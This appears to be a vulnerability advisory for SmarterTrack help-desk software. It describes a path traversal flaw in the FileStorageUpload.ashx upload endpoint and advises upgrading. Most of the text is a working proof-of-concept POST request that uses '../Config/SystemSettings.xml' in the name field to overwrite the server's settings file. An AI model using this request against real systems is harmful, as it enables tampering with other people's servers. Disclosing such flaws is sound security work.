Advisory

Upgrade to the latest version of SmarterTrack

Technical details

By sending a POST request, it was possible to upload or overwrite files in the application's webroot/app_data directory. Changing the `name` form-data parameter allows an attacker to perform a path traversal attack, since the value is used as a file path without being restricted to the intended upload folder.

POST /FileStorageUpload.ashx?folder=JmyciQLgWCiWph8GUboif0PUAb8bMw6aT1K4QShnrOfTqYytXk%2fB4GmSIcUhECmBwIryRnLLjiQkana0uaxYLDTq9vpisghs&token=a443a69146634d6b8e6c7d5a649aa6be HTTP/1.1
Host: test.local:9996
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.local:9996/Management/Tickets/frmTicket.aspx?ticketid=11
Content-Type: multipart/form-data; boundary=---------------------------41325027787306344272908251903
Content-Length: 1803
Origin: http://test.local:9996
Connection: close
Cookie: uidut=1; ----SNIP----

-----------------------------41325027787306344272908251903
Content-Disposition: form-data; name="name"

../Config/SystemSettings.xml
-----------------------------41325027787306344272908251903
Content-Disposition: form-data; name="file"; filename="SystemSettings.xml"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="utf-8"?>
<SystemSettings>
  <GeneralSettings>
    <DatabaseType>SQLSERVER</DatabaseType>
    <UseWindowsAuthentication>True</UseWindowsAuthentication>
    <DBPrefix>st_</DBPrefix>
    <ConnectionStringEnc>rrxpfuka4iM2rOkA2LMIrlvoeYUoVDWhZ6znuDffiVh4egXU9u330OQuAug2iO+8cnm5venRtfww0Ftkj/31ra+cxqAJupzAPinB2ZGEfxFWthq+JXcNKEUeU5o/BEe1TRELFyui9eC4/cvybYu6Bo12GoIMa3Otu0eCqpUz5p0QbYtClmhyWJKCx0FzJHZC</ConnectionStringEnc>
    <UniqueInstallID>750510454ca442f0b65cd9444d20a8e0</UniqueInstallID>
    <EnablePerSessionQueryLogging>True</EnablePerSessionQueryLogging>
    <EnablePerSessionQueryLoggingBasic>True</EnablePerSessionQueryLoggingBasic>
    <EnableLockTracing>True</EnableLockTracing>
    <EnablePopDupDetection>False</EnablePopDupDetection>
    <EnableCacheTracing>True</EnableCacheTracing>
    <SendOnAutoClose>False</SendOnAutoClose>
    <RunAutoClose>True</RunAutoClose>
    <HttpAbsolutePath>http://localhost:9996/</HttpAbsolutePath>
    <ServerName>WIN-E87FQ6TFQT4</ServerName>
    <SmtpUseSSL>False</SmtpUseSSL>
    <AuthenticateSSL>False</AuthenticateSSL>
    <SmtpUseTLS>False</SmtpUseTLS>
    <EnableSmtpAuth>False</EnableSmtpAuth>
    <SmtpMigrateDone>True</SmtpMigrateDone>
    <Content_LastUpdatedUTC7>2021-10-24 12:11:05Z</Content_LastUpdatedUTC7>
    <Content_ProductLink7>https://www.smartertools.com/smartertrack/online-help-desk</Content_ProductLink7>
    <Content_KeywordLink7>https://www.smartertools.com/smartertrack/online-help-desk</Content_KeywordLink7>
    <Content_KeywordText7>Help Desk Software</Content_KeywordText7>
    <Content_CompanyLink7>http://www.smartertools.com/</Content_CompanyLink7>
    <Content_CompanyText7>SmarterTools Inc.</Content_CompanyText7>
    <Content_BaseHelpLink7>https://help.smartertools.com/smartertrack/current/</Content_BaseHelpLink7>
  </GeneralSettings>
</SystemSettings>
-----------------------------41325027787306344272908251903--